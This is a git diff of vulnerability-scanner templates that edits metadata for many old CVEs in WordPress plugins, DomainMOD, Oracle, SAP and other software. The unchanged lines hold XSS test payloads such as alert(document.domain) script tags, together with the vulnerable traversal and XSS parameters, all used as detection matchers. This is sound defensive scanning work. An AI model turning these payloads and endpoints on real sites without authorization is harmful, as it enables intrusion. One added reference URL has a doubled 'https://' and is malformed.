diff --git a/cves/2008/CVE-2008-1059.yaml b/cves/2008/CVE-2008-1059.yaml
index 87271cc672..5d90733c1f 100644
--- a/cves/2008/CVE-2008-1059.yaml
+++ b/cves/2008/CVE-2008-1059.yaml
@@ -10,7 +10,7 @@ info:
     - https://www.exploit-db.com/exploits/5194
     - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
     - https://nvd.nist.gov/vuln/detail/CVE-2008-1059
-    - http://secunia.com/advisories/29099
+    - https://web.archive.org/web/20090615225856/http://secunia.com/advisories/29099/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
diff --git a/cves/2008/CVE-2008-1061.yaml b/cves/2008/CVE-2008-1061.yaml
index 8f620e243f..304f1e7f59 100644
--- a/cves/2008/CVE-2008-1061.yaml
+++ b/cves/2008/CVE-2008-1061.yaml
@@ -1,16 +1,15 @@
 id: CVE-2008-1061
 
 info:
-  name: Wordpress Plugin Sniplets 1.2.2 - Cross-Site Scripting
+  name: WordPress Sniplets <=1.2.2 - Cross-Site Scripting
   author: dhiyaneshDK
   severity: medium
   description: |
-    Multiple cross-site scripting (XSS) vulnerabilities in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) text parameter to (a) warning.php, (b) notice.php, and (c) inset.php in view/sniplets/, and possibly (d) modules/execute.php; the (2) url parameter to (e) view/admin/submenu.php; and the (3) page parameter to (f) view/admin/pager.php.
+    WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php.
   reference:
     - https://www.exploit-db.com/exploits/5194
     - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
     - https://nvd.nist.gov/vuln/detail/CVE-2008-1061
-    - http://secunia.com/advisories/29099
   classification:
     cve-id: CVE-2008-1061
   tags: xss,wp-plugin,wp,edb,wpscan,cve,cve2008,wordpress,sniplets
@@ -35,3 +34,6 @@ requests:
       - type: status
         status:
           - 200
+
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2011/CVE-2011-2744.yaml b/cves/2011/CVE-2011-2744.yaml
index 2049ed51fd..06ffccf68d 100644
--- a/cves/2011/CVE-2011-2744.yaml
+++ b/cves/2011/CVE-2011-2744.yaml
@@ -7,8 +7,8 @@ info:
   description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.
   reference:
     - https://www.exploit-db.com/exploits/35945
-    - https://www.cvedetails.com/cve/CVE-2011-2744
     - http://www.openwall.com/lists/oss-security/2011/07/13/6
+    - https://nvd.nist.gov/vuln/detail/CVE-2011-2744
     - http://web.archive.org/web/20140723162411/http://secunia.com/advisories/45184/
   classification:
     cve-id: CVE-2011-2744
diff --git a/cves/2011/CVE-2011-4804.yaml b/cves/2011/CVE-2011-4804.yaml
index f59ef6a417..5f1881d151 100644
--- a/cves/2011/CVE-2011-4804.yaml
+++ b/cves/2011/CVE-2011-4804.yaml
@@ -7,9 +7,9 @@ info:
   description: A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
   reference:
     - https://www.exploit-db.com/exploits/36598
-    - https://www.cvedetails.com/cve/CVE-2011-4804
     - http://web.archive.org/web/20140802122115/http://secunia.com/advisories/46844/
     - http://web.archive.org/web/20210121214308/https://www.securityfocus.com/bid/48944/
+    - https://nvd.nist.gov/vuln/detail/CVE-2011-4804
   remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2011-4804
diff --git a/cves/2012/CVE-2012-0896.yaml b/cves/2012/CVE-2012-0896.yaml
index 98a228cd06..77982c182d 100644
--- a/cves/2012/CVE-2012-0896.yaml
+++ b/cves/2012/CVE-2012-0896.yaml
@@ -7,9 +7,9 @@ info:
   description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.
   reference:
     - https://packetstormsecurity.com/files/108631/
-    - https://www.cvedetails.com/cve/CVE-2012-0896
     - http://web.archive.org/web/20140804110141/http://secunia.com/advisories/47529/
     - http://plugins.trac.wordpress.org/changeset/488883/count-per-day
+    - https://https://nvd.nist.gov/vuln/detail/CVE-2012-0896
   classification:
     cve-id: CVE-2012-0896
   metadata:
diff --git a/cves/2013/CVE-2013-5979.yaml b/cves/2013/CVE-2013-5979.yaml
index c0dbc559d6..cdf9722925 100644
--- a/cves/2013/CVE-2013-5979.yaml
+++ b/cves/2013/CVE-2013-5979.yaml
@@ -8,7 +8,6 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/26955
     - https://nvd.nist.gov/vuln/detail/CVE-2013-5979
-    - https://www.cvedetails.com/cve/CVE-2013-5979
     - https://bugs.launchpad.net/xibo/+bug/1093967
   classification:
     cve-id: CVE-2013-5979
diff --git a/cves/2014/CVE-2014-10037.yaml b/cves/2014/CVE-2014-10037.yaml
index b7fc75f5ce..2dc322050b 100644
--- a/cves/2014/CVE-2014-10037.yaml
+++ b/cves/2014/CVE-2014-10037.yaml
@@ -7,7 +7,6 @@ info:
   description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php.
   reference:
     - https://www.exploit-db.com/exploits/30865
-    - https://www.cvedetails.com/cve/CVE-2014-10037
     - https://nvd.nist.gov/vuln/detail/CVE-2014-10037
     - http://www.exploit-db.com/exploits/30865
   classification:
diff --git a/cves/2014/CVE-2014-5368.yaml b/cves/2014/CVE-2014-5368.yaml
index ac4f9995e0..9c05358fa2 100644
--- a/cves/2014/CVE-2014-5368.yaml
+++ b/cves/2014/CVE-2014-5368.yaml
@@ -8,7 +8,6 @@ info:
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2014-5368
     - https://www.exploit-db.com/exploits/39287
-    - https://www.cvedetails.com/cve/CVE-2014-5368
     - http://seclists.org/oss-sec/2014/q3/417
   classification:
     cve-id: CVE-2014-5368
diff --git a/cves/2014/CVE-2014-8799.yaml b/cves/2014/CVE-2014-8799.yaml
index 88fc61b781..68735c8d03 100644
--- a/cves/2014/CVE-2014-8799.yaml
+++ b/cves/2014/CVE-2014-8799.yaml
@@ -8,7 +8,6 @@ info:
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2014-8799
     - https://www.exploit-db.com/exploits/35346
-    - https://www.cvedetails.com/cve/CVE-2014-8799
     - https://wordpress.org/plugins/dukapress/changelog/
   classification:
     cve-id: CVE-2014-8799
diff --git a/cves/2015/CVE-2015-4127.yaml b/cves/2015/CVE-2015-4127.yaml
index 8881ad2efe..5d59f8802d 100644
--- a/cves/2015/CVE-2015-4127.yaml
+++ b/cves/2015/CVE-2015-4127.yaml
@@ -1,16 +1,16 @@
 id: CVE-2015-4127
 
 info:
-  name: WordPress Plugin church_admin - Cross-Site Scripting (XSS)
+  name: WordPress Church Admin <0.810 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: |
-    Cross-site scripting (XSS) vulnerability in the church_admin plugin before 0.810 for WordPress allows remote attackers to inject arbitrary web script or HTML via the address parameter, as demonstrated by a request to index.php/2015/05/21/church_admin-registration-form/.
+    WordPress Church Admin plugin before 0.810 allows remote attackers to inject arbitrary web script or HTML via the address parameter via index.php/2015/05/21/church_admin-registration-form/.
   reference:
     - https://www.exploit-db.com/exploits/37112
     - https://wpscan.com/vulnerability/2d5b3707-f58a-4154-93cb-93f7058e3408
-    - https://nvd.nist.gov/vuln/detail/CVE-2015-4127
     - https://wordpress.org/plugins/church-admin/changelog/
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-4127
   classification:
     cve-id: CVE-2015-4127
   tags: wp-plugin,wp,edb,wpscan,cve,cve2015,wordpress,xss
@@ -35,3 +35,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2016/CVE-2016-2389.yaml b/cves/2016/CVE-2016-2389.yaml
index 11dff64295..746f28abb2 100644
--- a/cves/2016/CVE-2016-2389.yaml
+++ b/cves/2016/CVE-2016-2389.yaml
@@ -7,7 +7,6 @@ info:
   description: SAP xMII 15.0 for SAP NetWeaver 7.4 is susceptible to a local file inclusion vulnerability in the GetFileList function. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the path parameter to /Catalog, aka SAP Security Note 2230978.
   reference:
     - https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
-    - https://www.cvedetails.com/cve/CVE-2016-2389
     - http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html
     - https://www.exploit-db.com/exploits/39837/
     - https://nvd.nist.gov/vuln/detail/CVE-2016-2389
diff --git a/cves/2016/CVE-2016-6601.yaml b/cves/2016/CVE-2016-6601.yaml
index 4170ae204a..fe0fe71da5 100644
--- a/cves/2016/CVE-2016-6601.yaml
+++ b/cves/2016/CVE-2016-6601.yaml
@@ -6,9 +6,9 @@ info:
   severity: high
   description: Directory traversal vulnerability in the file download functionality in ZOHO WebNMS Framework 5.2 and 5.2 SP1 allows remote attackers to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile
   reference:
-    - https://www.cvedetails.com/cve/CVE-2016-6601
     - https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt
     - https://www.exploit-db.com/exploits/40229/
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-6601
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
diff --git a/cves/2017/CVE-2017-11629.yaml b/cves/2017/CVE-2017-11629.yaml
index b6ba2688d1..5cb529d6b9 100644
--- a/cves/2017/CVE-2017-11629.yaml
+++ b/cves/2017/CVE-2017-11629.yaml
@@ -1,15 +1,15 @@
 id: CVE-2017-11629
 
 info:
-  name: FineCms 5.0.10 - Cross Site Scripting
+  name: FineCMS <=5.0.10 - Cross-Site Scripting
   author: ritikchaddha
   severity: medium
   description: |
-    dayrui FineCms through 5.0.10 has Cross Site Scripting (XSS) in controllers/api.php via the function parameter in a c=api&m=data2 request.
+    FineCMS through 5.0.10 contains a cross-site scripting vulnerability in controllers/api.php via the function parameter in a c=api&m=data2 request.
   reference:
     - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse
-    - https://nvd.nist.gov/vuln/detail/CVE-2017-11629/
     - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#api-php-Reflected-XSS
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-11629/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -39,3 +39,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2018/CVE-2018-19386.yaml b/cves/2018/CVE-2018-19386.yaml
index d4d33eccb1..2fbe11a15f 100644
--- a/cves/2018/CVE-2018-19386.yaml
+++ b/cves/2018/CVE-2018-19386.yaml
@@ -1,14 +1,15 @@
 id: CVE-2018-19386
 
 info:
-  name: SolarWinds Database Performance Analyzer 11.1. 457 - Cross Site Scripting
+  name: SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: SolarWinds Database Performance Analyzer 11.1.457 contains an instance of Reflected XSS in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI.
+  description: SolarWinds Database Performance Analyzer 11.1.457 contains a reflected cross-site scripting vulnerability in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI.
   reference:
     - https://www.cvedetails.com/cve/CVE-2018-19386/
     - https://i.imgur.com/Y7t2AD6.png
     - https://medium.com/greenwolf-security/reflected-xss-in-solarwinds-database-performance-analyzer-988bd7a5cd5
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19386
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -28,4 +29,6 @@ requests:
           - 200
       - type: word
         words:
-          - '<a href="javascript:alert(document.domain)//'
\ No newline at end of file
+          - '<a href="javascript:alert(document.domain)//'
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2018/CVE-2018-19439.yaml b/cves/2018/CVE-2018-19439.yaml
index 820f9ea603..e8efc5c201 100644
--- a/cves/2018/CVE-2018-19439.yaml
+++ b/cves/2018/CVE-2018-19439.yaml
@@ -1,14 +1,15 @@
 id: CVE-2018-19439
 
 info:
-  name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console
+  name: Oracle Secure Global Desktop Administration Console 4.4 - Cross-Site Scripting
   author: madrobot,dwisiswant0
   severity: medium
-  description: XSS exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602 (but was fixed in later versions including 5.4)
+  description: Oracle Secure Global Desktop Administration Console 4.4 contains a reflected cross-site scripting vulnerability in helpwindow.jsp via all parameters, as demonstrated by the sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp windowTitle parameter.
   reference:
     - http://web.archive.org/web/20210124221313/https://www.securityfocus.com/bid/106006/
-    - http://seclists.org/fulldisclosure/2018/Nov/58
     - http://packetstormsecurity.com/files/150444/Oracle-Secure-Global-Desktop-Administration-Console-4.4-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19439
+  remediation: Fixed in later versions including 5.4.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -25,3 +26,5 @@ requests:
         words:
           - "<script>alert(1337)</script><!--</TITLE>"
         part: body
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2018/CVE-2018-19749.yaml b/cves/2018/CVE-2018-19749.yaml
index 6dd0a2debc..cf27fb7f4d 100644
--- a/cves/2018/CVE-2018-19749.yaml
+++ b/cves/2018/CVE-2018-19749.yaml
@@ -5,10 +5,11 @@ info:
   author: arafatansari
   severity: medium
   description: |
-    DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via assets/add/account-owner.php Owner name field.
+    DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/account-owner.php Owner name field.
   reference:
     - https://github.com/domainmod/domainmod/issues/81
     - https://www.exploit-db.com/exploits/45941/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19749
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 4.8
@@ -49,3 +50,5 @@ requests:
           - 'contains(all_headers_3, "text/html")'
           - "contains(body_3, '><script>alert(document.domain)</script></a>')"
         condition: and
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2018/CVE-2018-19751.yaml b/cves/2018/CVE-2018-19751.yaml
index b12be30f5f..52342c68d5 100644
--- a/cves/2018/CVE-2018-19751.yaml
+++ b/cves/2018/CVE-2018-19751.yaml
@@ -5,11 +5,11 @@ info:
   author: arafatansari
   severity: medium
   description: |
-    DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /admin/ssl-fields/add.php Display Name, Description & Notes fields parameters.
+    DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /admin/ssl-fields/add.php Display Name, Description & Notes field parameters.
   reference:
     - https://www.exploit-db.com/exploits/45947/
-    - https://nvd.nist.gov/vuln/detail/CVE-2018-19751
     - https://github.com/domainmod/domainmod/issues/83
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19751
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 4.8
@@ -58,3 +58,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2018/CVE-2018-19752.yaml b/cves/2018/CVE-2018-19752.yaml
index 254ad5d37e..b24c063097 100644
--- a/cves/2018/CVE-2018-19752.yaml
+++ b/cves/2018/CVE-2018-19752.yaml
@@ -5,11 +5,11 @@ info:
   author: arafatansari
   severity: medium
   description: |
-    DomainMOD through 4.11.01 has XSS via the assets/add/registrar.php notes,registrar field.
+    DomainMOD through 4.11.01 contains a cross-site scripting vulnerability via the assets/add/registrar.php notes field for Registrar.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2018-19752
     - https://github.com/domainmod/domainmod/issues/84
     - https://www.exploit-db.com/exploits/45949/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19752
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 4.8
@@ -57,3 +57,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2018/CVE-2018-19877.yaml b/cves/2018/CVE-2018-19877.yaml
index 70de43fed9..2feb8e4312 100644
--- a/cves/2018/CVE-2018-19877.yaml
+++ b/cves/2018/CVE-2018-19877.yaml
@@ -1,14 +1,15 @@
 id: CVE-2018-19877
 
 info:
-  name: Adiscon LogAnalyzer 4.1.7 - Cross Site Scripting
+  name: Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting
   author: arafatansari
   severity: medium
   description: |
-    Adiscon LogAnalyzer  before 4.1.7 is affected by Cross-Site Scripting (XSS) in the 'referer' parameter of the login.php file.
+    Adiscon LogAnalyzer before 4.1.7 contains a cross-site scripting vulnerability in the 'referer' parameter of the login.php file.
   reference:
     - https://loganalyzer.adiscon.com/news/loganalyzer-v4-1-7-v4-stable-released/
     - https://www.exploit-db.com/exploits/45958/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19877
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -38,3 +39,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2018/CVE-2018-19892.yaml b/cves/2018/CVE-2018-19892.yaml
index 7dfa6eec98..9a9cdde683 100644
--- a/cves/2018/CVE-2018-19892.yaml
+++ b/cves/2018/CVE-2018-19892.yaml
@@ -5,10 +5,11 @@ info:
   author: arafatansari
   severity: medium
   description: |
-    DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /domain//admin/dw/add-server.php DisplayName parameters.
+    DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /domain//admin/dw/add-server.php DisplayName parameters.
   reference:
     - https://www.exploit-db.com/exploits/45959
     - https://github.com/domainmod/domainmod/issues/85
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19892
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 4.8
@@ -56,3 +57,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2018/CVE-2018-19914.yaml b/cves/2018/CVE-2018-19914.yaml
index fd4e1321c5..af02ee0b34 100644
--- a/cves/2018/CVE-2018-19914.yaml
+++ b/cves/2018/CVE-2018-19914.yaml
@@ -5,10 +5,11 @@ info:
   author: arafatansari
   severity: medium
   description: |
-    DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via assets/add/dns.php Profile Name or notes field.
+    DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/dns.php Profile Name or notes field.
   reference:
     - https://www.exploit-db.com/exploits/46375/
     - https://github.com/domainmod/domainmod/issues/87
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19914
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 4.8
@@ -49,3 +50,5 @@ requests:
           - 'contains(all_headers_3, "text/html")'
           - 'contains(body_3, "><script>alert(document.domain)</script></a>")'
         condition: and
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-1010290.yaml b/cves/2019/CVE-2019-1010290.yaml
index 36da70ab7c..4c2ef5bfde 100644
--- a/cves/2019/CVE-2019-1010290.yaml
+++ b/cves/2019/CVE-2019-1010290.yaml
@@ -7,8 +7,8 @@ info:
   description: Babel Multilingual site Babel All is affected by Open Redirection The impact is Redirection to any URL, which is supplied to redirect  in a newurl parameter. The component is redirect The attack vector is The victim must open a link created by an attacker
   reference:
     - https://untrustednetwork.net/en/2019/02/20/open-redirection-vulnerability-in-babel/
-    - https://www.cvedetails.com/cve/CVE-2019-1010290
     - http://dev.cmsmadesimple.org/project/files/729
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-1010290
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
diff --git a/cves/2019/CVE-2019-14974.yaml b/cves/2019/CVE-2019-14974.yaml
index 799b9f73b6..c98c3a4276 100644
--- a/cves/2019/CVE-2019-14974.yaml
+++ b/cves/2019/CVE-2019-14974.yaml
@@ -4,9 +4,10 @@ info:
   name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
   author: madrobot
   severity: medium
-  description: SugarCRM Enterprise 9.0.0 allows mobile/error-not-supported-platform.html?desktop_url= XSS.
+  description: SugarCRM Enterprise 9.0.0 contains a cross-site scripting vulnerability via mobile/error-not-supported-platform.html?desktop_url.
   reference:
     - https://www.exploit-db.com/exploits/47247
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-14974
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -27,3 +28,5 @@ requests:
         words:
           - "url = window.location.search.split(\"?desktop_url=\")[1]"
         part: body
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-15501.yaml b/cves/2019/CVE-2019-15501.yaml
index e14df74572..8fb0d3fd1d 100644
--- a/cves/2019/CVE-2019-15501.yaml
+++ b/cves/2019/CVE-2019-15501.yaml
@@ -1,14 +1,14 @@
 id: CVE-2019-15501
 
 info:
-  name: LSoft ListServ - XSS
+  name: L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting
   author: LogicalHunter
   severity: medium
-  description: Reflected cross site scripting (XSS) in L-Soft LISTSERV before 16.5-2018a exists via the /scripts/wa.exe OK parameter.
+  description: L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.
   reference:
     - https://www.exploit-db.com/exploits/47302
     - http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15501
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-15501
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -36,3 +36,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-15811.yaml b/cves/2019/CVE-2019-15811.yaml
index 58f9eabdb7..46c65e228a 100644
--- a/cves/2019/CVE-2019-15811.yaml
+++ b/cves/2019/CVE-2019-15811.yaml
@@ -1,15 +1,15 @@
 id: CVE-2019-15811
 
 info:
-  name: DomainMOD 4.13.0 - Cross-Site Scripting
+  name: DomainMOD <=4.13.0 - Cross-Site Scripting
   author: arafatansari
   severity: medium
   description: |
-    DomainMOD 4.13.0 is vulnerable to Cross Site Scripting (XSS) via /reporting/domains/cost-by-month.php in Daterange parameters.
+    DomainMOD through 4.13.0 contains a cross-site scripting vulnerability via /reporting/domains/cost-by-month.php in Daterange parameters.
   reference:
     - https://www.exploit-db.com/exploits/47325
     - https://github.com/domainmod/domainmod/issues/108
-    - https://zerodays.lol/
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-15811
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -44,3 +44,5 @@ requests:
           - 'contains(body_2, "value=\"\"onfocus=\"alert(document.domain)\"autofocus=")'
           - 'contains(body_2, "DomainMOD")'
         condition: and
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-15889.yaml b/cves/2019/CVE-2019-15889.yaml
index f5e335b75a..a804591c4d 100644
--- a/cves/2019/CVE-2019-15889.yaml
+++ b/cves/2019/CVE-2019-15889.yaml
@@ -1,14 +1,14 @@
 id: CVE-2019-15889
 
 info:
-  name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Download Manager <2.9.94 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: The download-manager plugin before 2.9.94 for WordPress has XSS via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
+  description: WordPress Download Manager plugin before 2.9.94 contains a cross-site scripting vulnerability via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
   reference:
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
     - https://www.cybersecurity-help.cz/vdb/SB2019041819
     - https://wordpress.org/plugins/download-manager/#developers
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-15889
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -36,3 +36,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-16332.yaml b/cves/2019/CVE-2019-16332.yaml
index fc7ada7814..1cf033a1f8 100644
--- a/cves/2019/CVE-2019-16332.yaml
+++ b/cves/2019/CVE-2019-16332.yaml
@@ -1,13 +1,14 @@
 id: CVE-2019-16332
 
 info:
-  name: API Bearer Auth <= 20181229 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress API Bearer Auth <20190907 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS.
+  description: WordPress API Bearer Auth plugin before 20190907 contains a cross-site scripting vulnerability. The server parameter is not correctly filtered in swagger-config.yaml.php.
   reference:
     - https://plugins.trac.wordpress.org/changeset/2152730
     - https://wordpress.org/plugins/api-bearer-auth/#developers
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-16332
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -35,3 +36,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-16525.yaml b/cves/2019/CVE-2019-16525.yaml
index 934701e911..a7866e5ed2 100644
--- a/cves/2019/CVE-2019-16525.yaml
+++ b/cves/2019/CVE-2019-16525.yaml
@@ -1,15 +1,15 @@
 id: CVE-2019-16525
 
 info:
-  name: Wordpress Plugin Checklist <= 1.1.5 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Checklist <1.1.9 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: An XSS issue was discovered in the checklist plugin before 1.1.9 for WordPress. The fill parameter is not correctly filtered in the checklist-icon.php file, and it is possible to inject JavaScript code.
+  description: WordPress Checklist plugin before 1.1.9 contains a cross-site scripting vulnerability. The fill parameter is not correctly filtered in the checklist-icon.php file.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2019-16525
     - https://wordpress.org/plugins/checklist/#developers
     - https://packetstormsecurity.com/files/154436/WordPress-Checklist-1.1.5-Cross-Site-Scripting.html
     - https://plugins.trac.wordpress.org/changeset/2155029/
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-16525
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -37,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-16931.yaml b/cves/2019/CVE-2019-16931.yaml
index 076ee50a85..870a85d2d8 100644
--- a/cves/2019/CVE-2019-16931.yaml
+++ b/cves/2019/CVE-2019-16931.yaml
@@ -1,16 +1,16 @@
 id: CVE-2019-16931
 
 info:
-  name: Visualizer < 3.3.1 - Stored Cross-Site Scripting (XSS)
+  name: WordPress Visualizer <3.3.1 - Cross-Site Scripting
   author: ritikchaddha
   severity: medium
   description: |
-    By abusing a lack of access controls on the /wp-json/visualizer/v1/update-chart WP-JSON API endpoint, an attacker can arbitrarily modify meta data of an existing chart, and inject a XSS payload to be stored and later executed when an admin goes to edit the chart.
+    WordPress Visualizer plugin before 3.3.1 contains a stored cross-site scripting vulnerability via /wp-json/visualizer/v1/update-chart WP-JSON API endpoint. An unauthenticated attacker can execute arbitrary JavaScript when an admin or other privileged user edits the chart via the admin dashboard.
   reference:
     - https://wpscan.com/vulnerability/867e000d-d2f5-4d53-89b0-41d7d4163f44
     - https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf
